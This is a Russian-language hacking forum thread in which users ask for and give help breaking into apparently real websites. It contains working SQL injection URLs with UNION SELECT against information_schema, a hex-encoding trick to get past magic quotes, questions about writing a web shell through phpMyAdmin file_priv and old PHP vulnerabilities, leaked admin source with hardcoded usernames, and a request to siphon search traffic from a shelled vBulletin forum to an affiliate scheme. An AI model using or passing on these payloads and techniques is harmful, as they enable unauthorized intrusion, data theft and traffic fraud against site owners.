В общем есть root phmyadm с file_priv, есть phpinfo. Папок с правами на запись не нашел, какие есть варианты кроме как искать lfi?
Имеется MySQL5 инъекция, мускул крутится на Win server 2008. Веб сервак - 80/tcp open http Microsoft IIS httpd 7.0. file_priv=y, но кавычки не пролазят. PHP - 5.2.17 (старый) В нем есть этот баг: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0831 Тоесть можно отключить MQ? Если да - можно попробовать записать файл. Есть варианты залится? Еще удалось прочитать исходник: admin/index.php PHP: <? include_once("../cfg.php"); NS::ExtractVars("user","pwd","a"); if(Admin::ChkUser(@$_COOKIE["_authChkUser_"],@$_COOKIE["_authChkPwd_"])) { if (@$_COOKIE["_authChkUser_"] == 'e@ug!ene_ok482' || @$_COOKIE["_authChkUser_"] == 'e@ka!terina_ab358' || @$_COOKIE["_authChkUser_"] == 'x@en!ia5_ve791') { header("Location: ".ROOT_ADMIN_HTTP."representatives.php"); } else { header("Location: ".ROOT_ADMIN_HTTP."start.php"); } } elseif(!$a) { ob_start(); ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content="text/html; charset=<?=Site::GetCharset()?>" /> <link rel="stylesheet" type="text/css" href="<?=CSS_ADMIN_HTTP?>styles.css" media="screen" /> </head> <body> <center> <img src="<?=IMG_ADMIN_HTTP?>1x1.gif" width='1px' height='300px'> <h1> <span class='red'>Project</span class='black'> <span>Manager</span> </h1> <form action='<?=ROOT_ADMIN_HTTP?>index.php' method="POST"> <input type='hidden' name='a' value='enter'> <table border='0'> <tr><td align='right'>User:</td><td align='center'><input type='text' name='user' value='' maxlength='100'></td></tr> <tr><td align='right'>Password:</td><td align='center'><input type='password' name='pwd' value='' maxlength='100'></td></tr> <tr><td align='center' colspan='2'><input type='submit' value='Enter'></td></tr> </table> </form> </center> </body> </html> <? $ret = ob_get_clean(); echo $ret; } elseif($a == 'enter') { if(Admin::ChkUser($user, md5($pwd))) { Cookie::Set("_authChkUser_",$user,time()+60*60*24); Cookie::Set("_authChkPwd_",md5($pwd),time()+60*60*24); if ($user == 'e@ug!ene_ok482' || $user == 'e@ka!terina_ab358' || $user == 'x@en!ia5_ve791') { header("Location: ".ROOT_ADMIN_HTTP."representatives.php"); } else { header("Location: ".ROOT_ADMIN_HTTP."start.php"); } } else { header("Location: ".ROOT_ADMIN_HTTP."index.php"); } } elseif($a == 'exit') { Cookie::Delete("_authChkUser_"); Cookie::Delete("_authChkPwd_"); header("Location: ".ROOT_ADMIN_HTTP."index.php"); } die; ?> Мне почему-то кажется, что он уязвим, не? И ещё туда же: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1823 5.2.17 - уязвим. в phpinfo() index.php?-s ничего не изменило. вай? Спасибо.
есть инъекция так работает нормально ?menu=95&add=50110339+and+1=0+union+select+1,table_name,3,4,5,6,7,8+from+information_schema.tables+--+ названия таблиц выводятся в столбик, есть таблица accounts,но я не могу вывести названия столбцов. Вывод ошибки тут отсутствует пробовал так: ?menu=95&add=50110339+and+1=0+union+select+1,column_name,3,4,5,6,7,8+from+information_schema.columns+where+table_name='accounts'+--+ не выходит а так выводится огромное кол-во столбцов: ?menu=95&add=50110339+and+1=0+union+select+1,column_name,3,4,5,6,7,8+from+information_schema.columns+--+ как мне вывести именно accounts? пробовал в hex переводить, кавычки ставить/убирать, не получается
Скорее всего у вас MQ включены. Следовательно, надо использовать запросы вида menu=95&add=50110339+and+1=0+union+select+1,column_name,3,4,5,6,7,8+from+information_schema.columns+where+table_name=0x6163636f756e7473+--+
Люди помогите раскрутить или подскажите в какую сторону крутить postgresql , при post запросе : login=1%27%22 выкидывает ошибку : Warning: pg_query() [<a href='function.pg-query'>function.pg-query</a>]: Query failed: ÎØÈÁÊÀ: îøèáêà ñèíòàêñèñà (ïðèìåðíîå ïîëîæåíèå: "\" LINE 1: ...SR_PASS" FROM main."RTH_WEBUSRS" WHERE "WEBUSR_NAME"='1\'\"' ^ in C:\Program Files (x86)\Apache Software Foundation\Apache2.2\htdocs\ххх\login.php on line 25 а дальше не получается ничего
такой вопросец, есть скуля, выводит только числовой резултат, если в выводе есть буквы или знаки то показывает ошибку, нехочется пол дня крутить как блинд, может есть каккие ни будь функции в mysql чтобы перевести строку в числовой вид(например ascii() толтко не символ а всю строку нужно ) чтобы потом можно было легко переобразовать обратно?
если например я на сайте нашел поле для ввода даты и там select начиная от 1900 до 2000, если я подменю это значение через html код на 7777 и отправлю результат, и в базу сохранится он, если результат примется и пройдёт - как это называется? - это sql инъекция ?
Скуль инъект - это когда выполняются запросы sql которые ты вводишь. Если запросы не выполняются, то это уже не скуль инъект. Мб xss... Все зависит от фильрации символов и где они выводятся.
Имееться шел на форуме vbulletin, интересует слив трафа с сайта через поисковик на партнёрку,как можна реализовать?
